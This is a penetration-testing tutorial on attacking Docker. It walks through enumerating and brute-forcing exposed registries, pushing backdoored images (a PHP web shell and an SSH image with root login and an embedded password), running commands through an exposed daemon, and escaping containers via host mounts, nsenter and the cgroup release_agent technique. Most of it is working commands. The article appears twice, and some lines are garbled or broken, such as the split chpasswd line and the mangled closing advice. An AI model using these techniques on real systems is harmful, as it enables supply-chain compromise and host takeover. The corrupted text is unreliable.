Docker containers are widely used for application deployment, but they come with security risks. In this guide, we will explore penetration testing methods for Docker: how to identify vulnerable registries, upload images, manipulate them, and potentially exploit vulnerabilities or escape from containers.
Understanding Docker Registry Vulnerabilities
A Docker registry is a place where Docker images are stored. Sometimes, these registries are set up without proper access controls, which can lead to the leakage of confidential information about images or application secrets. The task of the pen tester is to verify whether it's possible to enumerate images and gain access to them.
Step 1: Enumerating Entries in the Registry
To start, you can create a list of images in the registry:
curl http://<IP>:<Port>/v2/_catalog
The expected result is a JSON list of available repositories, for example, {"repositories":["alpine","ubuntu"]}.
In the case of unauthorized access, an error message may appear, prompting for authentication. To attempt unauthorized access, password brute-forcing tools like Hydra can be used to check common combinations of usernames and passwords:
hydra -L /path/to/userlist.txt -P /path/to/passlist.txt <IP> -s <Port> http-get /v2/_catalog
Step 2: Listing Tags and Checking Manifests
Once access is obtained, you can view the list of specific image tags to check the history of its versions:
```bash
```
curl http : // <IP> : <Port> / v2 / <repository> / <name> / tags / list
Then retrieve the manifest file, which contains metadata such as size, layers, and other information:
curl http : // <IP> : <Port> / v2 / <repository> / <name> / manifests / <tag>
Step 3: Extracting the Image for Analysis
If you control the Docker registry (or if it's configured insecurely), you can add malicious code to images that unsuspecting users will download and run.
Example: Creating a Backdoor for a WordPress Image.
Create a backdoor (e.g., a PHP shell):
<?php
echo shell_exec($_GET["cmd"]);
?>
2. Dockerfile for Creating a Backdoor for the Image:
FROM <ip>:<port>/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
3. Build and Upload the New Image:
docker build -t <ip>:<port>/wordpress .
docker push <ip>:<port>/wordpress
This approach creates an image with a shell accessible via HTTP requests, potentially allowing remote command execution.
Example: SSH Backdoor (Image to Bypass Protection)
If there is an SSH server image in the registry, you can modify its configuration to enable root access:
Download and modify the sshd_config file:
docker cp <container_id>:/etc/ssh/sshd_config .
Modify sshd_config to set PermitRootLogin yes.
2. Dockerfile for Integrating Modified SSH Configuration:
FROM <ip>:<port>/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root
assword | chpasswd
3. Build and Push:
docker build -t <ip>:<port>/sshd-docker-cli .
docker push <ip>:<port>/sshd-docker-cli
This method allows attackers to access the container via SSH using the embedded root password.
### Using Docker Daemon Access Vulnerabilities
If the Docker daemon is accessible over TCP, an attacker can remotely execute commands inside containers, which could potentially affect the host system if it is not properly isolated.
docker -H tcp://<IP>:<port> exec <container_id> <command>
I’ll let you get creative with the choice of commands you enter.
Methods for Escaping from Containers
Docker containers are designed for isolation, but certain configurations or vulnerabilities can allow an attacker to "escape" from the container and gain access to the host.
### Escape from Volume Mounting
If a container mounts the host's filesystem, it can access and manipulate host files:
docker run -v /:/mnt --rm -it <image> chroot /mnt sh
Explanation: This command mounts the host's filesystem into the container, providing full read and write access.
### Exploit in Namespace
In Linux, namespaces isolate system resources, allowing each container to be perceived as an independent environment. Key namespaces include:
- PID: Isolates processes.
- Network: Separates network interfaces.
- Mount: Limits filesystem visibility.
To escape from the container, you can use the following method with nsenter to access the host's namespace:
nsenter --target 1 --mount sh
Explanation: This command targets the host's namespace (usually the process with ID 1, representing the root directory), providing privileged access.
Explanation: This command targets the host's namespace (usually the process with ID 1, representing the root directory), providing privileged access.
### Escaping Privileged Mode
If the container is running in privileged mode, it has greater control over the host. To execute commands on the host, you can use control groups (cgroups):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path /exploit" > /tmp/cgrp/release_agent
In this scenario, the elevated privileges of the container allow it to interact directly with the host's resources.
Bonus: How to Check If You Are Inside a Docker Container
- List Running Processes: Containers have fewer processes than virtual machines. Use the ps aux option to view running processes.
- **Check for the .dockerenv File**: This .dockerenv file indicates a containerized environment.Check Cgroupsps**: Containerization tools like Docker use cgroups. Check the /proc/1/cgroup paths with the "docker" command to confirm the presence of a containerized environment.
### Final ThoughtsProtect Docker Registries with Authentication and Authorizationon**Restrict Docker Daemon Access Only to Trusted Users and Machineses**Review and Limit Container Permissions to Prevent Unauthorized Access to the Hostst**.
Understanding these methods will help you better secure Docker environments and prevent attacks. Remember to always conduct testing responsibly and within the bounds of the law!
Understanding Docker Registry Vulnerabilities
A Docker registry is a place where Docker images are stored. Sometimes, these registries are set up without proper access controls, which can lead to the leakage of confidential information about images or application secrets. The task of the pen tester is to verify whether it's possible to enumerate images and gain access to them.
Step 1: Enumerating Entries in the Registry
To start, you can create a list of images in the registry:
curl http://<IP>:<Port>/v2/_catalog
The expected result is a JSON list of available repositories, for example, {"repositories":["alpine","ubuntu"]}.
In the case of unauthorized access, an error message may appear, prompting for authentication. To attempt unauthorized access, password brute-forcing tools like Hydra can be used to check common combinations of usernames and passwords:
hydra -L /path/to/userlist.txt -P /path/to/passlist.txt <IP> -s <Port> http-get /v2/_catalog
Step 2: Listing Tags and Checking Manifests
Once access is obtained, you can view the list of specific image tags to check the history of its versions:
```bash
```
curl http : // <IP> : <Port> / v2 / <repository> / <name> / tags / list
Then retrieve the manifest file, which contains metadata such as size, layers, and other information:
curl http : // <IP> : <Port> / v2 / <repository> / <name> / manifests / <tag>
Step 3: Extracting the Image for Analysis
If you control the Docker registry (or if it's configured insecurely), you can add malicious code to images that unsuspecting users will download and run.
Example: Creating a Backdoor for a WordPress Image.
Create a backdoor (e.g., a PHP shell):
<?php
echo shell_exec($_GET["cmd"]);
?>
2. Dockerfile for Creating a Backdoor for the Image:
FROM <ip>:<port>/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
3. Build and Upload the New Image:
docker build -t <ip>:<port>/wordpress .
docker push <ip>:<port>/wordpress
This approach creates an image with a shell accessible via HTTP requests, potentially allowing remote command execution.
Example: SSH Backdoor (Image to Bypass Protection)
If there is an SSH server image in the registry, you can modify its configuration to enable root access:
Download and modify the sshd_config file:
docker cp <container_id>:/etc/ssh/sshd_config .
Modify sshd_config to set PermitRootLogin yes.
2. Dockerfile for Integrating Modified SSH Configuration:
FROM <ip>:<port>/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root
assword | chpasswd3. Build and Push:
docker build -t <ip>:<port>/sshd-docker-cli .
docker push <ip>:<port>/sshd-docker-cli
This method allows attackers to access the container via SSH using the embedded root password.
### Using Docker Daemon Access Vulnerabilities
If the Docker daemon is accessible over TCP, an attacker can remotely execute commands inside containers, which could potentially affect the host system if it is not properly isolated.
docker -H tcp://<IP>:<port> exec <container_id> <command>
I’ll let you get creative with the choice of commands you enter.
Methods for Escaping from Containers
Docker containers are designed for isolation, but certain configurations or vulnerabilities can allow an attacker to "escape" from the container and gain access to the host.
### Escape from Volume Mounting
If a container mounts the host's filesystem, it can access and manipulate host files:
docker run -v /:/mnt --rm -it <image> chroot /mnt sh
Explanation: This command mounts the host's filesystem into the container, providing full read and write access.
### Exploit in Namespace
In Linux, namespaces isolate system resources, allowing each container to be perceived as an independent environment. Key namespaces include:
- PID: Isolates processes.
- Network: Separates network interfaces.
- Mount: Limits filesystem visibility.
To escape from the container, you can use the following method with nsenter to access the host's namespace:
nsenter --target 1 --mount sh
Explanation: This command targets the host's namespace (usually the process with ID 1, representing the root directory), providing privileged access.
Explanation: This command targets the host's namespace (usually the process with ID 1, representing the root directory), providing privileged access.
### Escaping Privileged Mode
If the container is running in privileged mode, it has greater control over the host. To execute commands on the host, you can use control groups (cgroups):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path /exploit" > /tmp/cgrp/release_agent
In this scenario, the elevated privileges of the container allow it to interact directly with the host's resources.
Bonus: How to Check If You Are Inside a Docker Container
- List Running Processes: Containers have fewer processes than virtual machines. Use the ps aux option to view running processes.
- **Check for the .dockerenv File**: This .dockerenv file indicates a containerized environment.Check Cgroupsps**: Containerization tools like Docker use cgroups. Check the /proc/1/cgroup paths with the "docker" command to confirm the presence of a containerized environment.
### Final ThoughtsProtect Docker Registries with Authentication and Authorizationon**Restrict Docker Daemon Access Only to Trusted Users and Machineses**Review and Limit Container Permissions to Prevent Unauthorized Access to the Hostst**.
Understanding these methods will help you better secure Docker environments and prevent attacks. Remember to always conduct testing responsibly and within the bounds of the law!
